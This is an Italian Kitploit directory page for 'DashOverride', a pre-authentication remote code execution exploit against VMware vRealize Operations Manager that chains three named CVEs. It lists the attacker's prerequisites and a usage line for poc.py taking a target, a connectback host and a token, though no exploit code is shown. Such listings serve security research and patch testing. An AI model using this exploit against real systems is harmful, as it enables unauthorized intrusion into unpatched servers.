Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
DashOverride — Questo è un exploit RCE pre-autenticato per VMware vRealize Operations Manager | Kitploit
Strumenti/GitHubGitHub/sourceincite/dashoverride
Escalation di PrivilegiExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration TestingAutenticazione
GitHubsourceincite/dashoverride

DashOverride

Questo è un exploit RCE pre-autenticato per VMware vRealize Operations Manager

Vedi Repository
47162 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

DashOverride

Cos'è

Questo è un exploit RCE pre-autenticato per VMware vRealize Operations Manager (vROPS) che interessa le versioni <= 8.6.3.19682901.

Autore

Steven Seeley di Qihoo 360 Vulnerability Research Institute

Testato

L'exploit è stato testato contro la versione 8.6.3.19682901 usando il file vRealize-Operations-Manager-Appliance-8.6.3.19682901_OVF10.ova (SHA1: 4637b6385db4fbee6b1150605087197f8d03ba00) ma è noto che funzioni anche su altre versioni precedenti.

Note

  • Questo exploit combina tre vulnerabilità che sono state corrette. Ulteriori dettagli sono disponibili nel post del blog:

    • CVE-2022-31675 - MainPortalFilter ui Authentication Bypass
    • CVE-2022-31674 - SupportLogAction Information Disclosure
    • CVE-2022-31672 - generateSupportBundle VCOPS_BASE Privilege Escalation
  • Questo exploit richiede che l'attaccante fornisca:

    • Un token dashboardlink valido che verrà utilizzato per bypassare l'autenticazione.
    • Le proprie impostazioni del server SMTP, per garantire che l'exploit funzioni.
    • Un file Pak valido firmato da VMWare, come APUAT-8.5.0.18176777.pak.
  • Ci sono molte componenti in gioco in questo exploit, spero di averlo progettato bene così funziona al primo colpo.

  • L'exploit impiega in media ~1m34.142s per completarsi (testato 5 volte), ho provato a progettarlo per renderlo più veloce, ma rientra nel tempo assegnato per una competizione ;->

Esecuzione

root@kitploit:~
researcher@mars:~$ ./poc.py 
(+) usage: ./poc.py <target> <connectback> <dashboardlink_token>
(+) eg: ./poc.py 192.168.2.196 192.168.2.234 uuncuybis9

Esempio

Running DashOverride

Scarica lo strumento